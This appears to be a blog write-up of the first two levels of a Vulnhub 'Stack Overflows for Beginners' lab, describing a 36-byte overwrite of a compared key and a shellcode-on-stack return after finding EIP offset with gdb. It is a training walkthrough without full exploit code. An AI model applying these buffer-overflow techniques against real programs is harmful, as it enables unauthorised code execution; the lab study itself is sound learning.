Hello Guys , Here’s My Write up Part 1 For Stack Overflows Levels From Vulnhub https://www.vulnhub.com/entry/stack-overflows-for-beginners-1,290/

Level1:

First Let’s Look For Source Code

We Want to Provide The Binary an Input Via argv[1] And It Will Compare It , If The Value is Equal ( 0x42424242 ) It Will Give us ( “/bin/sh” ) We Need To overflow The Buffer More Than 32 To Write Value For ( key ) , If We Put 32 Character Then But Any Thing We Will Overwrite The ( key ) value .

if we break the cmp instruction and put “A”*36 and look to the value that will compare with it .

now we simply just replace last 4 “A” with 4 “B” to Get 0x42 with this code , Note: tget 0x42424242 send the address with little endian https://en.wikipedia.org/wiki/Endianness#Little-endian

:~$ ./levelOne $(python exploit.py)

___________________________________________________________________

Level2:

Let’s Start With level2 , there’s no source code for this binary we want to run it with debugger . ( e.g gdb )

$ gdb -q ./levelTwo

there’s two function ( setuid , hello ) , we will looking for hello function . let’s disassemble it and see

Mmm strcpy , printf ? let’s run the binary and see

there’s SIGSEGV or segmentation fault because in main cmp ( compare ) the argument that you provide to it let’s add an argument and run again .

function hello just print out the argument that we give it , let’s try to overflow the buffer with a pattern to see the size of buffer for that argument . i use this pattern : ’AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ’

segmentation fault again but now the EIP ( Extended Instruction Pointer ) can’t execute the address ( 0x4a4a4a4a) “J” , first step we control the EIP and we know the buffer size . How?

Now Let’s check the memory protection by run checksec in gdb , the NX disabled that mean we can execute instruction in stack . we can exploit it with run shellcode in stack and make EIP return to the beginning of shellcode address .

Get Abdullah AL-Rashdan’s stories in your inbox

Join Medium for free to get updates from this writer.

SHELLCODE : A set of instructions that are injected by the user and executed by the exploited binary , SHELLCODE + Padding + AddressTOShellCode all With 40 Byte

Shell-Code That i Use : http://shell-storm.org/shellcode/files/shellcode-517.php

examine 50 word in hex from esp to esp-100 ESP ( Extended Stack Point ) the beginning of the Stack Frame

here’s the stack frame with buffer overflow we can see the start address of our input in 0xffffd228 ( 0x41414141) “A” in hex , now let’s build the exploit code using python .

we will use this address 0xffffd288 .

$ ./levelTwo $(python exp.py)

Stack Overflows for Beginners: 1

Level1:

Level2:

$ gdb -q ./levelTwo

Get Abdullah AL-Rashdan’s stories in your inbox

Related Things :

Thanks .